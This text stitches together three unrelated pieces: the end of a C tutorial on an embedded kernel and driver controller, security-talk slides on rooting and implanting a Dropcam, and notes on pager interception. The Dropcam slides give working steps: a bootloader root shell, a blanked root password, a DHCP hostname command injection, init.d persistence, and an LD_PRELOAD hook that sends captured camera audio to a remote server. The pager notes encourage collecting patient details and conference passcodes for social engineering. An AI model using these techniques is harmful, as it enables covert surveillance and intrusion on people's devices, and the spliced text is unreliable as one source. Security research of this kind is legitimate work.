ResetaTimer(1000); //reset with 1ms
kernelClock();
}
In order to use the kernel we just need to call its initialization function, add the processes with their
frequency of execution and call the kernelLoop() function.
//Blink led 1
char tst1(void) {
BitFlp(PORTD,0);
return REPEAT;
}
//Blink led 2
char tst2(void) {
BitFlp(PORTD,1);
return REPEAT;
}
//Blink led 3
char tst3(void) {
BitFlp(PORTD,2);
return REPEAT;
}
void main(void){
//declaring the processes: {function, period, start}
process p1 = {tst1,100,0};
process p2 = {tst2,1000,0};
process p3 = {tst3,10000,0};
kernelInit();
kernelAddProc(p1);
kernelAddProc(p2);
kernelAddProc(p3);
kernelLoop();
}
9 Building the device driver controller
In order to isolate the drivers from the kernel (and consequently from the applications) we will build a device
driver controller. It will be responsible for loading the drivers and passing the orders received from the kernel to the
right driver.
9.1 Device Driver Pattern
All kernels present some kind of pattern for building device drivers. This standardization is fundamental
to the system: only by having a standard interface can the kernel communicate with a driver that it knows
nothing about at compile time.
In order to simplify the pointer usage, we've built several typedefs. ptrFuncDrv is a pointer to a
function that returns a char (error/success code) and receives a pointer to void as parameter. It is used to call
each driver's functions, as all of them must have this signature.
typedef char(*ptrFuncDrv)(void *parameters);
The driver struct is composed of the driver id, an array of ptrFuncDrv pointers (represented as a pointer)
and a special function also of the type ptrFuncDrv. This last function is responsible to initialize the driver once it
is loaded.
typedef struct {
char drv_id;
ptrFuncDrv *functions;
ptrFuncDrv drv_init;
} driver;
For the device driver controller to access the device drivers, it needs to get a pointer to a “driver
structure”. Instead of making a static link, we set the links with a pointer to a function that, when called,
returns the desired device driver.
typedef driver* (*ptrGetDrv)(void);
A generic driver then needs to implement at least 2 functions: init() and getDriver(). It also needs to have
a driver struct and an array of pointers, each position pointing to one of the functions it implements. It is also
necessary to build an enumerator defining the position of each function pointer in the array.
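Such a generic driver could look like the hedged sketch below. The typedefs repeat the ones above; the function bodies are placeholders and the names follow the generic-driver diagram in the next section:

```c
typedef char (*ptrFuncDrv)(void *parameters);

typedef struct {
    char drv_id;
    ptrFuncDrv *functions;
    ptrFuncDrv drv_init;
} driver;

/* enumerator fixing each function's slot in the array */
enum { GEN_FUNC_1, GEN_FUNC_2, GEN_FUNC_END };

/* placeholder implementations */
static char genericDrvFunc1(void *parameters) { (void)parameters; return 0; }
static char genericDrvFunc2(void *parameters) { (void)parameters; return 0; }
static char init(void *parameters) { (void)parameters; return 0; }

/* order must match the enumerator */
static ptrFuncDrv this_functions[GEN_FUNC_END] = {
    genericDrvFunc1, /* GEN_FUNC_1 */
    genericDrvFunc2  /* GEN_FUNC_2 */
};

static driver thisDriver = { 0 /*drv_id*/, this_functions, init };

/* the only externally visible entry point */
driver *getDriver(void) { return &thisDriver; }
```

Everything except getDriver() can be static: the controller reaches the driver's functions only through the struct it returns.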
9.2 Controller engine
The device driver controller needs at least to know all the available drivers. This is done with a vector of
ptrGetDrv, in which each position holds a pointer to the driver function that returns its driver struct. The
position at which each pointer is stored in the vector is defined by an enumerator, helping to identify which pointer
belongs to which driver.
A generic driver can be summarized by the following class description:
drvGeneric
- thisDriver: driver
- this_functions: ptrFuncDrv[ ]
+ availableFunctions: enum = {GEN_FUNC_1, GEN_FUNC_2}
- init(parameters: void*): char
+ getDriver(): driver*
- genericDrvFunc1(parameters: void*): char
- genericDrvFunc2(parameters: void*): char
//it is needed to include all drivers file
#include "drvInterrupt.h"
#include "drvTimer.h"
#include "drvLcd.h"
//this enumerator helps the developer to access the drivers
enum {
DRV_INTERRUPT,
DRV_TIMER,
DRV_LCD,
DRV_END /*DRV_END should always be the last*/
};
//the functions to get the drivers should
//be put in the same order as in the enum
static ptrGetDrv drvInitVect[DRV_END] = {
getInterruptDriver,
getTimerDriver,
getLCDDriver
};
The device driver controller has an array of drivers and a counter indicating how many drivers are loaded
at the moment. There are only 3 functions: one to initialize the internal variables, one to load a driver and one
to parse the commands from the kernel to the correct driver.
Loading a driver is pretty straightforward. If the DRV_INTERRUPT driver needs to be loaded, we go to the
available drivers list and ask for the interrupt driver. Then we call its initialization routine and store it in the
loaded list. If there is no space for another driver, the function returns an error.
char initDriver(char newDriver) {
    char resp = FAIL;
    if(driversLoaded < QNTD_DRV) { //QNTD_DRV: maximum number of loaded drivers
        drivers[driversLoaded] = drvInitVect[newDriver]();
        resp = drivers[driversLoaded]->drv_init(&newDriver);
        driversLoaded++;
    }
    return resp;
}
The call driver routine goes through the loaded drivers list to identify the correct driver. When there is a
match, the correct function is called and the parameters are passed as a pointer to void (at this moment we do
not know what the parameters are).
char callDriver(char drv_id, char func_id, void *parameters) {
    char i;
    for (i = 0; i < driversLoaded; i++) {
        if (drv_id == drivers[i]->drv_id) {
            return drivers[i]->functions[func_id](parameters);
        }
    }
    return DRV_FUNC_NOT_FOUND;
}
9.3 Using the controller engine
In order to use the controller engine we just need to include its header in the main file and make use of
the enumerators defined in each driver file to access the hardware.
void main(void) {
//system initialization
//the kernel also starts the controller init function
kernelInit();
initDriver(DRV_LCD);
callDriver(DRV_LCD, LCD_CARACTER, 'U');
callDriver(DRV_LCD, LCD_CARACTER, 'n');
callDriver(DRV_LCD, LCD_CARACTER, 'i');
callDriver(DRV_LCD, LCD_CARACTER, 'f');
callDriver(DRV_LCD, LCD_CARACTER, 'e');
callDriver(DRV_LCD, LCD_CARACTER, 'i');
}
The LCD_CARACTER function in the DRV_LCD driver sends a character (ASCII coded) to the LCD attached to
the microcontroller. If there is any need to change the LCD, or the port to which it is connected, the
application is kept intact; the developer only needs to change the driver.
9.4 Interesting situations
There are some interesting solutions that help the application keep its high abstraction level while still
interacting with the hardware. One of these situations is hiding the interrupt routine inside a driver while still
allowing the application developer to define its behavior.
//defining the type of pointer to use as an interrupt
typedef void (*intFunc)(void);
//store the pointer to interrupt service routine here
static intFunc thisInterrupt;
char setInterruptFunc(void *parameters) {
thisInterrupt = (intFunc) parameters;
return SUCCESS;
}
The interrupt driver stores a pointer inside itself. This pointer can be changed via the setInterruptFunc()
function; the actual interrupt function is passed as a parameter.
Also inside the driver file is the compiler-specific code that indicates which function handles the
interrupt:
//SDCC compiler way
void isr(void) interrupt 1{
thisInterrupt();
}
//C18 compiler way
void isr (void){
thisInterrupt();
}
#pragma code highvector=0x08
void highvector(void){
_asm goto isr _endasm
}
#pragma code
By using a pointer to store the ISR, the low-level details of the compiler are hidden from the
application.
9.5 Driver callback
In some I/O processes we ask for something and then need to wait for the answer, generally by
polling the done bit. With the device driver controller, we can call the driver asking it to start its work and
pass a function that will be called back when it has finished its job. This way we save CPU processing time while
still getting the result as fast as possible.
In order to accomplish this, the driver must be able to raise an interrupt in the system.
First the application requests the data from the driver and passes the callback function. The driver stores the
callback for later use, starts the process and sets up the interrupt routine. All this is done in normal/application
mode.
//Process called by the kernel
char adc_func(void) {
static process proc_adc_callback = {adc_callback, 0, 0};
callDriver(DRV_ADC,ADC_START,&proc_adc_callback);
return REPEAT;
}
//function called by the process adc_func (via driver controler)
char startConversion(void* parameters){
callBack = parameters;
ADCON0 |= 0b00000010;
//start conversion
callDriver(DRV_INTERRUPT,INT_ADC_SET,(void*)adcISR);
return SUCCESS;
}
When the desired interrupt happens, the interrupt function that was set is called. The driver does all the required
procedures (copy data, raise flags, etc.). Before finishing, the driver creates a new process in the kernel. Note that
all this work is done in interrupt mode; these functions should be fast in order to avoid starvation of the
normal/application mode.
//interrupt function
void isr(void) interrupt 1 {
if (BitTst(INTCON, 2)) {//Timer overflow
timerInterrupt();
}
if (BitTst(PIR1, 6)) {//ADC conversion finished
//calling ISR stored in the adcInterrupt function pointer
adcInterrupt();
}
}
//function on the ADC driver called by the ISR
void adcISR(void){
value = ADRESH;
value <<= 8;
value += ADRESL;
BitClr(PIR1,6);
kernelAddProc(callBack);
}
When the callback becomes the next one in the process pool, the kernel will grant it its share of processor time.
Now, inside the callback process, we can devote more time to processor-hungry tasks, such as signal filtering,
permanent data storage, etc.
//callback function started from the kernel
char adc_callback(void) {
unsigned int resp;
//getting the converted value
callDriver(DRV_ADC,ADC_LAST_VALUE,&resp);
//changing line and printing on LCD
callDriver(DRV_LCD,LCD_LINE,1);
callDriver(DRV_LCD,LCD_INTEGER,resp);
return SUCCESS; | pdf |
www.synack.com
@colbymoore
@patrickwardle
optical surgery; implanting a dropcam
colby moore / patrick wardle
Synack
Colby Moore (vrl/synack)
Patrick Wardle (nasa/nsa/vrl/synack)
Synack’s R&D team
who we are
> an outline
overview
root access
vulnerabilities
implant
an overview
what/why?
“Dropcam is a cloud-based Wi-Fi video monitoring service with
free live streaming, two-way talk and remote viewing that
makes it easy to stay connected with places, people and pets,
no matter where you are.” (dropcam.com)
cloud recording
night vision
two-way talk
intelligent alerts
> setup
or
> a target
got a target on your back?!
extremely popular
found in interesting locations
useful capabilities
rooting a dropcam
popping one of these #
> probing some portz
exposed 3.3v UART
breakout board (FTDI serial to USB)
serial connection (pin 3 & 4)
> and action!
password prompt
$ screen /dev/tty.usbserial-A603NJ6C 115200
[0.000000] Linux version 2.6.38.8 (dropcambuild@linux-ws) (gcc version 4.5.2 (Sourcery G++ Lite 2011.03-41) )
[0.000000] CPU: ARMv6-compatible processor [4117b365] revision 5 (ARMv6TEJ), cr=00c5387f
[0.000000] CPU: VIPT nonaliasing data cache, VIPT nonaliasing instruction cache
!
...
!
!
!
.:^:.
.o0WMMMMMNOc. lk,
dWMMMMNXNMMMMWl .NMc
dMMMMd. .kMMMMl .oOXNX0kWMc cX0xXNo .oOXNX0d' .0XxxKNNKx; :kKNNKx. .lOXNNKx, :XXxKNXOldKNNKd.
KMMMO KMMM0 lWNd;',lXMMc oMMo'..dWNo,',oXWx .WMWk;',c0M0. .KMO:'':; ;NWx;',cKMK. lMMx'.oWMX;.'0MO
OMMMW; cWMMMx .MM: .WMc oMX 'MM, 'WM;.WMd XMo kM0 KMx .WMd lMM' .XMo cMX
.0MMMM0..cKMMMMk 0M0' .dMMc oMX .XMk' .xMX..WMK; .lWW, cWW: dMX, .oMMd lMM' .XMo cMX
:XM0:dNMMMMO; oNMNKXMNWMc oMX .dNMNKXMNx. .WMWMNKXMWO' ;0WWKKWN, cKMNKXWWWMd lMM' .XMo cMK
;.0MMMMO, .;:;. ';. .;. .;:;. .WMo.,:;'. .,::,. .;:;'..;. .;; ,;. .;.
'ONx' .WM:
..
!
Ambarella login:
> accessing the bootloader
bootloader
$ screen /dev/tty.usbserial-A603NJ6C 115200
!
___ ___ _________ _
/ _ \ | \/ || ___ \ | |
/ /_\ \| . . || |_/ / ___ ___ | |_
| _ || |\/| || ___ \ / _ \ / _ \ | __|
| | | || | | || |_/ /| (_) || (_) || |_
\_| |_/\_| |_/\____/ \___/ \___/ \__|
----------------------------------------------------------
Amboot(R) Ambarella(R) Copyright (C) 2004-2007
...
amboot>
power on
hit ‘enter’
> booting in a root shell
set boot parameters to /bin/sh
amboot> help
The following commands are supported:
help bios diag dump
erase exec ping r8
r16 r32 reboot reset
setenv show usbdl w8
w16 w32 bapi
amboot> help setenv
Usage: setenv [param] [val]
sn - Serial number
auto_boot - Automatic boot
cmdline - Boot parameters
auto_dl - Automatically try to boot over network
tftpd - TFTP server address
...
!
amboot>setenv cmdline DCSEC console=ttyS0 ubi.mtd=bak root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh
!
amboot>reboot
bootloader’s help
bootloader’s setenv command
> nop’ing out r00t’s password
reset boot params
# ls -l /etc/shadow
/etc/shadow -> /mnt/dropcam/shadow
!
# more /etc/fstab
# /etc/fstab: static file system information.
#
# <file system> <mount pt> <type>
# /dev/root / ext2
…
# NFS configuration for ttyS0
/dev/mtdblock9 /mnt/dropcam jffs2
!
# mount -tjffs2 /dev/mtdblock9 /mnt/dropcam
# vi /etc/shadow
root:$1$Sf9tWhv6$HCsGEUpFvigVcL7aV4V2t.:10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
!
# more /etc/shadow
root::10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
!
reboot
root :)
vulnerabilities
….
> the environment
#uname -a
Linux Ambarella 2.6.38.8 #80 PREEMPT Aug 2013 armv6l GNU/Linux
!
# ps aux | grep connect
821 root 0:10 /usr/bin/connect
823 root 0:13 /usr/bin/connect
824 root 0:00 /usr/bin/connect
linux (arm 32-bit)
…and dropcam
specific binaries
> decently secure
no open ports
all communications
secured
unique provisioning
> heartbleed (client side)
# openssl version
OpenSSL 1.0.1e 11 Feb 2013
openssl version
yah, this is vulnerable
> heartbleed (client side)
> busybox (cve-2011-2716)
busybox: “is a multi-call binary that
combines many common Unix utilities
into a single executable”
malicious DHCP server
//unpatched version
case OPTION_STRING:
    memcpy(dest, option, len);
    dest[len] = '\0';
    return ret;
;process OPTION_STRING/OPTION_STRING_HOST
MOV    R0, R4
MOV    R1, R5
MOV    R2, R7
BL     memcpy          ;memcpy(dest, option, len)
MOV    R3, #0
STRB   R3, [R4,R7]     ;dest[len] = '\0';
“host.com;evil cmd”
cve-2011-2716: “scripts (may) assume that
hostname is trusted, which may lead to code
execution when hostname is specially crafted”
dropcam disassembly
> ‘direct usb’
power on
no need to open device!
> OS X privilege escalation
$ ls -lart /Volumes/Dropcam\ Pro/Setup\ Dropcam\ \(Macintosh\).app/Contents/MacOS/
!
-rwxrwxrwx 1 patrick staff 103936 Aug 12 2013 Setup Dropcam (Macintosh)
drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 ..
drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 .
app%binary%is%world%writable!
non-priv’d attacker on host
infected dropcam app
r00t == yes
cuckoo’s egg
a dropcam implant
> the implant should…
see
hear
infect
command shell
locate
infil/exfil
survey
> conceptually
corporate network
“He sees you when you're sleeping
He knows when you're awake
He knows if you've been bad or good”
(like the NSA? j/k)
> finding the “brain”
how does the dropcam, hear, see, and
think?
where is the brain?!
> the connect binary
the /usr/bin/connect binary is a
monolithic program that largely
contains the dropcam specific logic.
> but it’s non-standardly packed….
$ hexdump -C dropCam/fileSystem/usr/bin/connect
!
00000000 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 28 00 01 00 00 00 a0 f5 06 00 34 00 00 00 |..(.........4...|
00000020 74 81 06 00 02 02 00 05 34 00 20 00 02 00 28 00 |t.......4. ...(.|
00000030 03 00 02 00 01 00 00 00 00 00 00 00 00 80 00 00 |................|
00000040 00 80 00 00 8c 7e 06 00 8c 7e 06 00 05 00 00 00 |.....~...~......|
00000050 00 80 00 00 01 00 00 00 90 5a 00 00 90 5a 14 00 |.........Z...Z..|
00000060 90 5a 14 00 00 00 00 00 00 00 00 00 06 00 00 00 |.Z..............|
00000070 00 80 00 00 7f d2 62 0c 55 50 58 21 04 09 0d 17 |......b.UPX!....|
$ upx -d dropCam/fileSystem/usr/bin/connect
Ultimate Packer for eXecutables
!
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
!
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: connect: IOException: bad write
!
Unpacked 1 file: 0 ok, 1 error.
upx’d
unpack error :/
> packed connect
packer stub was identified as NRV2E
and identically matched source (armv4_n2e_d8.S)
!
-> the stub was not modified/customized
//elf%unpack%function
void%PackLinuxElf32::unpack(OutputFile%*fo)
{
%
...
%%%bool%const%is_shlib%=%(ehdrc>e_shoff!=0);%
%
//this%code%path%taken
%
if(is_shlib)
%
{
%
%
%
//exception%is%thrown%here
upx%src;%p_lx_elf.cpp
//elf header
#define EI_NIDENT 16
typedef struct {
    Elf_Char   e_ident[EI_NIDENT];
    Elf32_Half e_type;
    Elf32_Half e_machine;
    Elf32_Word e_version;
    Elf32_Addr e_entry;
    Elf32_Off  e_phoff;
    Elf32_Off  e_shoff;
    ...
} Elf32_Ehdr;
> generically unpacking connect
connect is not a shared library
…why is is_shlib true (due to e_shoff != 0)?
#unset ehdr->e_shoff
with open(fileName, 'rb') as packedFile:
    fileBytez = list(packedFile.read())

#zero out ehdr->e_shoff
fileBytez[SH_OFFSET:SH_OFFSET+SH_SIZE] = [0]*SH_SIZE
$ python dropWham.py connect -unpack
[+] unsetting ehdr->e_shoff
[+] invoking UPX to unpack
Ultimate Packer for eXecutables
File size Ratio Format Name
-------------------- ------ ----------- -----------
890244 <- 426577 47.92% linux/armel connect
Unpacked 1 file.
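The e_shoff-zeroing step that dropWham.py performs can be sketched in a few lines of stdlib Python. This is only an illustrative reimplementation of that one step (dropWham.py is the authors' own tool); 0x20 is the offset of e_shoff in a 32-bit little-endian ELF header, matching SH_OFFSET/SH_SIZE in the snippet above.

```python
# Sketch of the dropWham.py step above: zero out ehdr->e_shoff so UPX's
# is_shlib heuristic (e_shoff != 0) no longer sends the unpacker down the
# shared-library code path that throws "bad write".

SH_OFFSET = 0x20  # offset of e_shoff in a 32-bit ELF header
SH_SIZE = 4       # e_shoff is an Elf32_Off (4 bytes)

def unset_e_shoff(data: bytes) -> bytes:
    """Return a copy of the packed ELF image with ehdr->e_shoff zeroed."""
    buf = bytearray(data)
    buf[SH_OFFSET:SH_OFFSET + SH_SIZE] = b"\x00" * SH_SIZE
    return bytes(buf)
```

After patching, `upx -d` can be run against the modified file, as in the session above.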
!
$ strings connect
Dropcam Connect - Version: %d, Build: %d (%s, %s, %s)
jenkins-connect-release-node=linux-144, origin/release/grains_of_paradise
CONNECT_BUILD_INFO
CONNECT_PLATFORM
CONNECT_VERSION
nexus.dropcam.com
...
can use for evilz?!
> the persistent core
easy
portable
modules
# du -sh
34.6M
!
# less /etc/init.d/S40myservices
...
tar -xvf python2.7-stripped.tgz -C /tmp/
/tmp/bin/python2.7 /implant/cuckoo.py &
!
cuckoo’s nest…something
not enough space for python
persist as init.d script-
decompress custom python
…and action!
> networking C&C
# netstat -t
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 1144 192.168.0.2:40978 ec2-54-196-21-142.compute-1.amazonaws.com:https ESTABLISHED
tcp 0 1337 192.168.0.2:41988 ec2-54-196-21-130.compute-1.amazonaws.com:https ESTABLISHED
which is legit? ;)
command and control channel
streaming channel
dropcam/cuckoo’s egg connections
> geolocation
?
{iwlist-wlan0-scan}
googleapis.com/geolocation/v1/geolocate?
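The geolocation step pairs an `iwlist wlan0 scan` with Google's geolocation endpoint. A minimal sketch of building that request body follows; the MAC addresses and signal levels are placeholders, and any field beyond the documented `considerIp`/`wifiAccessPoints` schema is an assumption, not the implant's actual code.

```python
import json

def build_geolocate_body(scan_results):
    """Build a Google Geolocation API request body from wifi scan results.

    scan_results: iterable of (bssid, signal_dbm) tuples, e.g. parsed
    out of `iwlist wlan0 scan` output.
    """
    body = {
        "considerIp": False,  # locate by the scanned APs, not the egress IP
        "wifiAccessPoints": [
            {"macAddress": bssid, "signalStrength": dbm}
            for bssid, dbm in scan_results
        ],
    }
    return json.dumps(body)
```

The resulting JSON would be POSTed to the googleapis.com/geolocation/v1/geolocate endpoint shown above (with an API key).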
> host infection
> host infection
this is the (implanted) device!
renamed (original) binary
OS X kindly hides app details
> host infection (OS X)
XProtect
Gatekeeper
OSX Sandbox
Code Signing
he wins!
<
> audio and video
/usr/bin/connect
kernel mode
conceptually
more specifically
> injection
the connect binary exclusively
opens both the audio card
# arecord
arecord: audio open error
!
Device or resource busy
connect’s-process space
kernel mode
injected module
# LD_PRELOAD=./injectMe.so
/usr/bin/connect
module injection
no sharing
> hooking
//blah
int main()
{
    //do something
    result = someFunction();
    printf("result: %#x\n", result);
}

//blah
int someFunction()
{
    //do something
    return someInt;
}

//blah
int someFunction()
{
    //do something EVIL
    return someInt;
}
same name &
declaration
> grabbing audio
dropcam uses the Advanced Linux Sound
Architecture (ALSA) for audio
//blah
LDR     R2, [R11,#size]
LDR     R0, [R5,#0xFC]
SUB     R1, R11, #ptrptrBuffer
BL      snd_pcm_readn       ;read audio!
CMP     R0, R2
BEQ     readOK
...
LDR     R1, ="read from audio interface failed"
MOV     R0, R4              ;=stderr
BL      fprintf
finally some disasm ;)
get some audio
snd_pcm_sframes_t snd_pcm_readn(
    snd_pcm_t *pcm,
    void **bufs,
    snd_pcm_uframes_t size)

“Read non interleaved frames to a PCM”
> programmatically hooking audio
//replaces snd_pcm_readn
//captures dropcam's audio
snd_pcm_sframes_t snd_pcm_readn(snd_pcm_t *pcm, void **bufs, snd_pcm_uframes_t size)
{
  //function pointer for real snd_pcm_readn()
  static snd_pcm_sframes_t (*orig_snd_pcm_readn)(snd_pcm_t*, void**, snd_pcm_uframes_t) = NULL;

  //frames read
  snd_pcm_sframes_t framesRead = 0;

  //get original function pointer for snd_pcm_readn()
  if(NULL == orig_snd_pcm_readn)
      orig_snd_pcm_readn = (snd_pcm_sframes_t(*)(snd_pcm_t*, void**, snd_pcm_uframes_t))dlsym(RTLD_NEXT, "snd_pcm_readn");

  //invoke original snd_pcm_readn()
  framesRead = orig_snd_pcm_readn(pcm, bufs, size);

  //exfil captured audio
  if(framesRead > 0)
      sendToServer(AUDIO_SERVER, AUDIO_SERVER_PORT, bufs, size);

  return framesRead;
}
injected into connect process
> grabbing video
dropcam talks to a propriety Ambarrella kernel module to
access the h.264 encoded video stream :/
//blah
LDR     R0, ="/dev/iav"
MOV     R1, #2          ; oflag
MOV     R2, #0
BL      open
send ioctl to video driver
open video device
//blah
MOV     R0, R5
LDR     R1, =0x40046540 ; ioctl
MOV     R2, #0xD
BL      ioctl
CMP     R0, #0
LDRLT   R0, ="IAV_IOC_START_ENCODE_EX"
BLT     printError
undocumented struct :/
//blah
MOV     R3, #1
MOV     R0, R5          ; fd
LDR     R1, =0x80046537 ; request
ADD     R2, SP, #0x120+var_D8
STRB    R3, [R8]
BL      ioctl
CMP     R0, #0
LDRLT   R0, =aIav_ioc_read_b ; "IAV_IOC_READ_BITSTREAM_EX"
BLT     printError
> grabbing video
open the /dev/iav device
map BSB memory via
IAV_IOC_MAP_BSB ioctl
map DSP memory via
IAV_IOC_MAP_DSP ioctl
get the streams state via
IAV_IOC_GET_ENCODE_STREAM_INFO_EX ioctl
then check that its IAV_STREAM_STATE_ENCODING
finally, read the stream
via the IAV_IOC_READ_BITSTREAM_EX ioctl
get the h.264 parameters
via IAV_IOC_GET_H264_CONFIG_EX ioctl
> manipulating video (conceptually)
connect’s-process space
injected module
> manipulating video (example)
size and pointer to frame
allows the malicious code to
swap out frames on the fly….or
just replay one(s) to loop the
video stream!
IAV_IOC_READ_BITSTREAM_EX ioctl
> cuckoo’s egg C&C server
> cuckoo’s egg C&C server
status/result
command data
> questions/answers
@colbymoore
@patrickwardle
[email protected]
[email protected]
> creditz
images: dropcam.com
icons: iconmonstr.com
flaticon.com | pdf |
1
NYCMIKE
The World of Pager Sniffing and Interception:
More Activity than one may suspect.
+
=
Music: The Cools Kids – Gold and a Pager
The idea is the let the music play while folks enter the room then move on to
the next slide.
(Point out the obvious) Pager interception was once well documented and
“wildly” done within certain groups. Therefore I’m no trailblazer or am I? Old
tech is not bad tech, its dated,
Its documented, but still useable and interesting. The idea is to re-
introduced the activity with some ideas that may of not been available in the
early to mid 90’s.
I want to stress again that OLD TECH IS NOT BAD TECH…if anything its
tried and tested.
*note* I probably should of removed or just covered up the text in that screen
capture… What do you see when you read it.
2
NYCMIKE
-- “Do not go where the path may lead, go instead where there is no path and leave a trail.”
- Ralph Waldo Emerson
-- “Everything that was or ever is began with a dream.”
- Lava Girl
Quote (1) : Pager interception has been done, therefore the path has been
made so how does this relate? Things evolve over time this is no exception
so I encourage all to find the
new path. The challenge to reinvent, rethink, and retool is open to
all… amateur SIGINT (radio monitoring) is a blast (expensive) join the ranks
and help the hobby.
Quote (2) : Don’t be afraid to think outside of the box. Try your concepts
sometime things just work.
3
NYCMIKE
Who is this guy?
Nicks:
Steve from Idaho, Snuffalupugus, NYCMIKE and Dr. Love and a few others.
Work History:
Busboy at a local banquet hall, Gas station clerk (slurpe tech), Public service.
Hobbies:
Electronics, SIGINT (explain), making stuff and breaking stuff.
I’m just a guy in love with radio. If you want to drop me some knowledge in
this field please do so at one of the following places: irc (irc.2600.net
#telephreak/#radio/#make/#ca2600) or the Telephreak voice bridge
(www.telephreak.org). Chances are I will not be there under the name
NYCMIKE so just ask the question in #telephreak.
4
NYCMIKE
Quick look
PAGERS… Are you serious, this isn’t 1993, who uses these pager things anymore?
IBM DOC FWD e-mails
SANDIA Los Alamos Labs
DHS Sports updating
DOT Hospitals (patient details)
BOP Teleconferences
AND MANY MORE…
Okay off the bat lets agree that with the exception of niche markets pager
technology has been replaced. Cost used to be the factor that favored the
pager, that is no longer the case. An advantage the pager will have as long
as its network is active, is signal penetration and strength. The signal is
offset so that gaps or “shadows” are filled. Once you get the setup
configured and going you’ll have hours of entertainment (For me this is the
case).
There is traffic and it can be juicy; e.g. several companies hold telephone
conference calls (which means they page the conf number and pass code,
which COULD lead to a non invited party to lurk on the line), SANDIA sends
msg similar to “Call Ralph at XYZ corp and here is his number”, DHS could
be sending out SA updates, DOT….., BOP offers the happenings of
correctional institutes (lock down or hey we found dope in a glassine bag
buried in inmate JOHN DOE’s anal cavity), Sporting events (numbers and
lines), the hospital data is disturbing due to the amount of info given out
(patients name and complaints, not to mention lab results), The phone
conferences are just asking to be recorded…
The thing to note is that this mode of communications is still in use and still
very much visible. Keep in mind that at face value some data may not seem
useful and it may not be to some, BUT the fact is this sort of information is
what can be useable in SE operations.
5
NYCMIKE
Learning Objectives
Refreshing on Pager Technology
- Cap Codes, Protocols (Pocsag/ Flex/ Golay/ Ermes)
Laws governing the interception and decoding of pager traffic.
Data Slicers
Discriminator taps
Q: How do pagers work?
A: RF, A intends to send a msg to B, A’s msg enters the network…. sat,
transmitters on cell phone towers
Common protocols are pocsag and flex in the US…
These are the two I hear the most, therefore this is what I’ll cover.
Q: CapCodes?
A: unique ID’s, unit will only activate when it hears its ID/CAPCODE over the
air
Q:Data Slicers?
A: Converts analog and digital (FSK)
Q: Discriminator tap?
A: Base band audio
Q: illegal?
A: Not always
Note I’ve added golay/ermes BECAUSE when listening to online scanners
its online thus not limited to US
POCSAG: Post Office Code Standardization Advisory Group
ERMES (European Radio Messaging System)
6
NYCMIKE
Learning Objectives
Basic SIGINT
A brief look at the disciplines and how they are being used.
Targeting, amount of RCVR’s, Sig detection, traffic analysis.
Ways to search through the data and finding that needle in the haystack
Basic SIGINT? (I call it SIGINT cause it sounds cool but by definition these
techniques are used.)
SIGnals INTelligence
Disciplines:
Targeting: Pager networks need for multiple.
Coordinated rcvrs: ( This ideology is explored in the concepts segment
of this talk). By deploying “deployable” units or “linking” up with other
operations. Not all subscribers
have nationwide service, therefore having multi rcvrs would broaden
collections.
Signal detection: Know the freq range then use the SA/Band Scope to
search for poss. Signal
Traffic Analysis: Again knowing capcodes is important, by doing this you
begin to “map” the network, which enhances the
entertainment value.
Q: The responsibility of knowledge?
A: You may see things that could be damaging but then again to share
would be illegal… BE SMART with what you find.
Q: What is good, what is crap, what may be useful down the line?
A: Research, I think this is the what makes the whole hobby worth wild for
me…
7
NYCMIKE
Pager Refresher
- The Rise and Fall
- Uses
- US pager protocols
Rise/Fall | Uses | US Protocols
===========================================================
=========================
Cost of Cell phones and Professional POCSAG, FLEX
Capabilities have pushed Personal
Use down
This will be extremely general assuming that most of this is common
knowledge. If the audience shows interest ( I will ask), I’ll mention the cost
verse function factor. The main point is to stress that old tech doesn’t mean
it’s bad tech.
8
NYCMIKE
Setting Up the “Station”
Antennas:
RCV 25-1300MHz TRANSMIT RCV 108-1300MHz
VHF and UHF signals that have high signal strength, with that said the stock
antenna should work fine.
Pre amp, if one where to be used it needs to be located outside at the
antenna. For pager signals it is not needed, but it wouldn’t be a bad idea if
you’re trying to go after other signal types.
The antennas shown should be higher but due to the community I live in
putting them higher is not an option.
9
NYCMIKE
Setting Up the “Station”
Cables:
1/8 not 1/4
RG-58/59/8
RS 232 DB 9
Get the right RCA
Explain the difference in coax (50 ohm/75 ohm)
DB 9 adapters will not work with PDW
I get my cables from www.allelectronics.com
10
NYCMIKE
Setting Up the “Station”
Decoding Software:
Windows Linux DOS
http://www.pervisell.com/ham/shot_en.htm
multimon
Multimon decodes using sound card (Also AX.25 – packet radio BBS, DTMF)
- linux
PDW decodes using sound card (Also Flex, ACARS, MOBITEX & ERMES) –
widows
POC32…
Radioraft…
I strictly use PDW… but that doesn’t mean you should. Sample different
apps and find out what works for you.
11
NYCMIKE
Setting Up the “Station”
Radios:
PC Controlled NON PC Controlled
PC controlled allows the radio to become remote…
NON PC allows the operation to be lower cost…
12
NYCMIKE
Setting Up the “Station”
Radios:
Choosing the right fit.
- Cost
- Mobility
- Ease of use
Cost: How much you plan to spend is up to you , but why go overboard when
you can buy a mobile within the
Needed freq range for so much cheaper (pro-84) or a desktop (bd 855 xlt)
Mobility: This may be a concern for me it is not.
Ease of use: The Plug and Play (PNP) concept doesn’t always work. In radio
there are all sorts of models and
not every operator is as skilled as the as next.
13
NYCMIKE
Setting Up the “Station”
www.discriminator.nl
Discriminator Taps:
TK-10421
(Toko America)
Pin 11
This field has been well documented… Thanks to the late Bill Cheek
Either pin 9 or 11 in most cases where you need to tap off of.
14
NYCMIKE
Setting Up the “Station”
What is it?
Why is it needed?
Finding the Discriminator IC?
Discriminator Taps:
What is it:
A physical connection from a pin off the discriminator IC/circuit (the pin
varies depending on the chip), this connection
allows access to the raw audio so that the rcvd signal can be decoded.
Why is it needed:
In order to decode digital mods the raw signal is needed, raw meaning
before it has reached the “audio stage” this is known as “baseband audio”.
Finding the chip:
A large amount of documentation regarding current and pass scanners
exist… (go into more detail)
15
NYCMIKE
Setting Up the “Station”
Data Slicers
Level 2 Level 4
Not very expensive to either make or buy… both slicers can be bought for
lvl2 ($16) and lvl4 ($24) w/ power adapter, both prices may have changed.
(check ebay)
